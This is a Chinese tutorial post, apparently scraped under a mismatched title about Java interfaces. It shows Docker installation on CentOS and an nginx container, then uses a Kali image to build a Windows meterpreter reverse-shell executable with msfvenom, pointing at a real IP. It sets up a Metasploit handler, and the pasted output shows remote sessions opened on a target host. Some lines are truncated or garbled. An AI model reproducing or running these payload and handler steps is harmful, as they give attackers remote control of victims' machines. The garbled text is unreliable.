java中的接口是类吗
350
2022-10-10
docker使用教程(docker使用步骤)
1. 购买一个外网的服务器,这里我使用的是centos
2. 配置yum源
wget -O /etc/yum.repos.d/docker-ce.repo yum clean all; yum makecache fast --重新刷新yum源
3. 安装与启动docker
yum -y install docker-ce systemctl restart docker systemctl enable docker 开机自启
4. 搜索与安装容器
4.1 以 nginx 为例
docker search nginx 搜索 docker pull nginx 安装nginx
4.2 启动 nginx
docker run --name web1 -d -p 80:80 nginx --name :表示启动的名字 -d: daemon,守护进程 -p:设置映射端口 验证页面,输入网址即可访问
对页面进行修改:
docker exec -it web1 /bin/bash 进入容器 root@3e93e119b79c:/# cat /usr/share/nginx/html/ 50x.html index.html root@3e93e119b79c:/# echo "
5. 安装外网kali
先搜索
docker search kali
安装
docker pull booyaabes/kali-linux-full
使用
[root@vultr ~]# docker image ls REPOSITORY TAG IMAGE ID CREATED SIZE booyaabes/kali-linux-full latest 4bffca040c1c 6 hours ago 8.31GB nginx latest bc26f1ed35cf 16 hours ago 109MB [root@vultr ~]# docker run -it 4bffca040c1c root@c5785446988a:/# cat /etc/os-release PRETTY_NAME="Kali GNU/Linux Rolling" NAME="Kali GNU/Linux" ID=kali VERSION="2018.4" VERSION_ID="2018.4" ID_LIKE=debian ANSI_COLOR="1;31" HOME_URL="https://kali.org/" SUPPORT_URL="https://forums.kali.org/" BUG_REPORT_URL="run -p 4444:4455 -it booyaabes/kali-linux-full
使用docker映射容器4455端口到local上的4444端口
[root@vultr ~]# docker container ls CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 8612e672d5db booyaabes/kali-linux-full "/bin/sh -c \"/bin/ba…" 2 minutes ago Up 2 minutes 0.0.0.0:4444->4455/tcp hungry_goldberg [root@vultr ~]# docker attach 8612e672d5db 进入kali容器之中
制作payload(使用本地的kali制作payload)
root@kal:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=149.248.8.210 LPORT=4444 -f exe > test.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of exe file: 73802 bytes
将exe文件放到目标主机上在kali容器中运行msf
[root@vultr ~]# docker attach 9b2fcb0c1d21 root@9b2fcb0c1d21:/# msfconsole , , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| =[ metasploit v4.17.14-dev ] + -- --=[ 1809 exploits - 1030 auxiliary - 313 post ] + -- --=[ 539 payloads - 42 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: ] msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 149.248.8.210 lhost => 149.248.8.210 msf exploit(multi/handler) > set lport 4455 port => 4455 msf exploit(multi/handler) > run [-] Handler failed to bind to 149.248.8.210:4455:- - [*] Started reverse TCP handler on 0.0.0.0:4455 [*] Sending stage (179779 bytes) to 42.90.91.248 [*] Meterpreter session 1 opened (172.17.0.3:4455 -> 42.90.91.248:11526) at 2018-09-26 09:39:23 +0000 [*] Sending stage (179779 bytes) to 42.90.91.248 [*] Meterpreter session 2 opened (172.17.0.3:4455 -> 42.90.91.248:11528) at 2018-09-26 09:39:25 +0000 meterpreter >
这样就拿到了反弹shell
docker借鉴学习:https://yeasy.gitbooks.io/docker_practice/image/
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~